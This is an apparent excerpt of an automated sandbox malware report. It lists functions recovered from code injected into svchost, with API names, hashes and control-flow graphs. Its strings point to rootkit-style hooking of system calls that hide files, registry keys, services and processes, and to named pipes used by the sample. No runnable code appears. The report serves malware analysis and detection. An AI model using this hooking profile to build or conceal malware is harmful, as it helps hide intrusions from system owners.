                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10
                                                                                Function 00000195DD5C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760
                                                                                Function 00000195DD596910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 211 195dd596910-195dd596916 212 195dd596951-195dd59695b 211->212 213 195dd596918-195dd59691b 211->213 214 195dd596a78-195dd596a8d 212->214 215 195dd59691d-195dd596920 213->215 216 195dd596945-195dd596984 call 195dd596fc0 213->216 220 195dd596a8f 214->220 221 195dd596a9c-195dd596ab6 call 195dd596e54 214->221 218 195dd596922-195dd596925 215->218 219 195dd596938 __scrt_dllmain_crt_thread_attach 215->219 234 195dd596a52 216->234 235 195dd59698a-195dd59699f call 195dd596e54 216->235 226 195dd596931-195dd596936 call 195dd596f04 218->226 227 195dd596927-195dd596930 218->227 224 195dd59693d-195dd596944 219->224 222 195dd596a91-195dd596a9b 220->222 232 195dd596aef-195dd596b20 call 195dd597190 221->232 233 195dd596ab8-195dd596aed call 195dd596f7c call 195dd596e1c call 195dd597318 call 195dd597130 call 195dd597154 call 195dd596fac 221->233 226->224 243 195dd596b22-195dd596b28 232->243 244 195dd596b31-195dd596b37 232->244 233->222 238 195dd596a54-195dd596a69 234->238 246 195dd5969a5-195dd5969b6 call 195dd596ec4 235->246 247 195dd596a6a-195dd596a77 call 195dd597190 235->247 243->244 248 195dd596b2a-195dd596b2c 243->248 249 195dd596b7e-195dd596b94 call 195dd59268c 244->249 250 195dd596b39-195dd596b43 244->250 261 195dd5969b8-195dd5969dc call 195dd5972dc call 195dd596e0c call 195dd596e38 call 195dd59ac0c 246->261 262 195dd596a07-195dd596a11 call 195dd597130 246->262 247->214 255 195dd596c1f-195dd596c2c 248->255 268 195dd596b96-195dd596b98 249->268 269 195dd596bcc-195dd596bce 249->269 256 195dd596b4f-195dd596b5d call 195dd5a5780 250->256 257 195dd596b45-195dd596b4d 250->257 264 195dd596b63-195dd596b78 call 195dd596910 256->264 278 195dd596c15-195dd596c1d 256->278 257->264 261->262 314 195dd5969de-195dd5969e5 __scrt_dllmain_after_initialize_c 261->314 262->234 282 195dd596a13-195dd596a1f call 195dd597180 262->282 264->249 264->278 268->269 275 195dd596b9a-195dd596bbc call 195dd59268c call 195dd596a78 268->275 276 195dd596bd0-195dd596bd3 269->276 277 195dd596bd5-195dd596bea call 195dd596910 269->277 275->269 308 195dd596bbe-195dd596bc6 call 195dd5a5780 275->308 276->277 276->278 277->278 296 195dd596bec-195dd596bf6 277->296 278->255 301 195dd596a21-195dd596a2b call 195dd597098 282->301 302 195dd596a45-195dd596a50 282->302 298 195dd596c01-195dd596c11 call 195dd5a5780 296->298 299 195dd596bf8-195dd596bff 296->299 298->278 299->278 301->302 313 195dd596a2d-195dd596a3b 301->313 302->238 308->269 313->302 314->262 315 195dd5969e7-195dd596a04 call 195dd59abc8 314->315 315->262
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00
                                                                                Function 00000195DD5CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                                • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                                  • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                                  • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                                  • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700
                                                                                Function 00000195DD5C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00
                                                                                Function 00000195DD5CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 590 195dd5ca544-195dd5ca5ac call 195dd5cb414 593 195dd5ca5b2-195dd5ca5b5 590->593 594 195dd5caa13-195dd5caa1b call 195dd5cc748 590->594 593->594 595 195dd5ca5bb-195dd5ca5c1 593->595 597 195dd5ca690-195dd5ca6a2 595->597 598 195dd5ca5c7-195dd5ca5cb 595->598 600 195dd5ca963-195dd5ca967 597->600 601 195dd5ca6a8-195dd5ca6ac 597->601 598->597 602 195dd5ca5d1-195dd5ca5dc 598->602 605 195dd5ca9a0-195dd5ca9aa call 195dd5c9634 600->605 606 195dd5ca969-195dd5ca970 600->606 601->600 603 195dd5ca6b2-195dd5ca6bd 601->603 602->597 604 195dd5ca5e2-195dd5ca5e7 602->604 603->600 607 195dd5ca6c3-195dd5ca6ca 603->607 604->597 608 195dd5ca5ed-195dd5ca5f7 call 195dd5c9634 604->608 605->594 619 195dd5ca9ac-195dd5ca9cb call 195dd5c7940 605->619 606->594 609 195dd5ca976-195dd5ca99b call 195dd5caa1c 606->609 611 195dd5ca894-195dd5ca8a0 607->611 612 195dd5ca6d0-195dd5ca707 call 195dd5c9a10 607->612 608->619 623 195dd5ca5fd-195dd5ca628 call 195dd5c9634 * 2 call 195dd5c9d24 608->623 609->605 611->605 616 195dd5ca8a6-195dd5ca8aa 611->616 612->611 628 195dd5ca70d-195dd5ca715 612->628 620 195dd5ca8ba-195dd5ca8c2 616->620 621 195dd5ca8ac-195dd5ca8b8 call 195dd5c9ce4 616->621 620->605 627 195dd5ca8c8-195dd5ca8d5 call 195dd5c98b4 620->627 621->620 634 195dd5ca8db-195dd5ca8e3 621->634 659 195dd5ca62a-195dd5ca62e 623->659 660 195dd5ca648-195dd5ca652 call 195dd5c9634 623->660 627->605 627->634 632 195dd5ca719-195dd5ca74b 628->632 636 195dd5ca751-195dd5ca75c 632->636 637 195dd5ca887-195dd5ca88e 632->637 639 195dd5ca8e9-195dd5ca8ed 634->639 640 195dd5ca9f6-195dd5caa12 call 195dd5c9634 * 2 call 195dd5cc6a8 634->640 636->637 641 195dd5ca762-195dd5ca77b 636->641 637->611 637->632 643 195dd5ca8ef-195dd5ca8fe call 195dd5c9ce4 639->643 644 195dd5ca900 639->644 640->594 645 195dd5ca781-195dd5ca7c6 call 195dd5c9cf8 * 2 641->645 646 195dd5ca874-195dd5ca879 641->646 654 195dd5ca903-195dd5ca90d call 195dd5cb4ac 643->654 644->654 671 195dd5ca804-195dd5ca80a 645->671 672 195dd5ca7c8-195dd5ca7ee call 195dd5c9cf8 call 195dd5cac38 645->672 651 195dd5ca884 646->651 651->637 654->605 668 195dd5ca913-195dd5ca961 call 195dd5c9944 call 195dd5c9b50 654->668 659->660 665 195dd5ca630-195dd5ca63b 659->665 660->597 675 195dd5ca654-195dd5ca674 call 195dd5c9634 * 2 call 195dd5cb4ac 660->675 665->660 667 195dd5ca63d-195dd5ca642 665->667 667->594 667->660 668->605 679 195dd5ca87b 671->679 680 195dd5ca80c-195dd5ca810 671->680 690 195dd5ca7f0-195dd5ca802 672->690 691 195dd5ca815-195dd5ca872 call 195dd5ca470 672->691 696 195dd5ca68b 675->696 697 195dd5ca676-195dd5ca680 call 195dd5cb59c 675->697 684 195dd5ca880 679->684 680->645 684->651 690->671 690->672 691->684 696->597 700 195dd5ca9f0-195dd5ca9f5 call 195dd5cc6a8 697->700 701 195dd5ca686-195dd5ca9ef call 195dd5c92ac call 195dd5caff4 call 195dd5c94a0 697->701 700->640 701->700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                                • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00
                                                                                Function 00000195DD599944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 469 195dd599944-195dd5999ac call 195dd59a814 472 195dd5999b2-195dd5999b5 469->472 473 195dd599e13-195dd599e1b call 195dd59bb48 469->473 472->473 474 195dd5999bb-195dd5999c1 472->474 476 195dd599a90-195dd599aa2 474->476 477 195dd5999c7-195dd5999cb 474->477 479 195dd599d63-195dd599d67 476->479 480 195dd599aa8-195dd599aac 476->480 477->476 481 195dd5999d1-195dd5999dc 477->481 482 195dd599da0-195dd599daa call 195dd598a34 479->482 483 195dd599d69-195dd599d70 479->483 480->479 484 195dd599ab2-195dd599abd 480->484 481->476 485 195dd5999e2-195dd5999e7 481->485 482->473 495 195dd599dac-195dd599dcb call 195dd596d40 482->495 483->473 486 195dd599d76-195dd599d9b call 195dd599e1c 483->486 484->479 488 195dd599ac3-195dd599aca 484->488 485->476 489 195dd5999ed-195dd5999f7 call 195dd598a34 485->489 486->482 492 195dd599ad0-195dd599b07 call 195dd598e10 488->492 493 195dd599c94-195dd599ca0 488->493 489->495 499 195dd5999fd-195dd599a28 call 195dd598a34 * 2 call 195dd599124 489->499 492->493 504 195dd599b0d-195dd599b15 492->504 493->482 496 195dd599ca6-195dd599caa 493->496 501 195dd599cba-195dd599cc2 496->501 502 195dd599cac-195dd599cb8 call 195dd5990e4 496->502 537 195dd599a48-195dd599a52 call 195dd598a34 499->537 538 195dd599a2a-195dd599a2e 499->538 501->482 508 195dd599cc8-195dd599cd5 call 195dd598cb4 501->508 502->501 517 195dd599cdb-195dd599ce3 502->517 510 195dd599b19-195dd599b4b 504->510 508->482 508->517 514 195dd599b51-195dd599b5c 510->514 515 195dd599c87-195dd599c8e 510->515 514->515 518 195dd599b62-195dd599b7b 514->518 515->493 515->510 519 195dd599df6-195dd599e12 call 195dd598a34 * 2 call 195dd59baa8 517->519 520 195dd599ce9-195dd599ced 517->520 522 195dd599b81-195dd599bc6 call 195dd5990f8 * 2 518->522 523 195dd599c74-195dd599c79 518->523 519->473 524 195dd599d00 520->524 525 195dd599cef-195dd599cfe call 195dd5990e4 520->525 550 195dd599c04-195dd599c0a 522->550 551 195dd599bc8-195dd599bee call 195dd5990f8 call 195dd59a038 522->551 529 195dd599c84 523->529 533 195dd599d03-195dd599d0d call 195dd59a8ac 524->533 525->533 529->515 533->482 548 195dd599d13-195dd599d61 call 195dd598d44 call 195dd598f50 533->548 537->476 554 195dd599a54-195dd599a74 call 195dd598a34 * 2 call 195dd59a8ac 537->554 538->537 542 195dd599a30-195dd599a3b 538->542 542->537 547 195dd599a3d-195dd599a42 542->547 547->473 547->537 548->482 555 195dd599c0c-195dd599c10 550->555 556 195dd599c7b 550->556 570 195dd599bf0-195dd599c02 551->570 571 195dd599c15-195dd599c72 call 195dd599870 551->571 575 195dd599a76-195dd599a80 call 195dd59a99c 554->575 576 195dd599a8b 554->576 555->522 560 195dd599c80 556->560 560->529 570->550 570->551 571->560 579 195dd599df0-195dd599df5 call 195dd59baa8 575->579 580 195dd599a86-195dd599def call 195dd5986ac call 195dd59a3f4 call 195dd5988a0 575->580 576->476 579->519 580->579
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00
                                                                                Function 00000195DD5CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                                • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350
                                                                                Function 00000195DD5C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                                Function 00000195DD5CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                                Function 00000195DD5C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                                Function 00000195DD5C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                                • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                                Function 00000195DD5D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                                Function 00000195DD5C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                                Function 00000195DD5C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
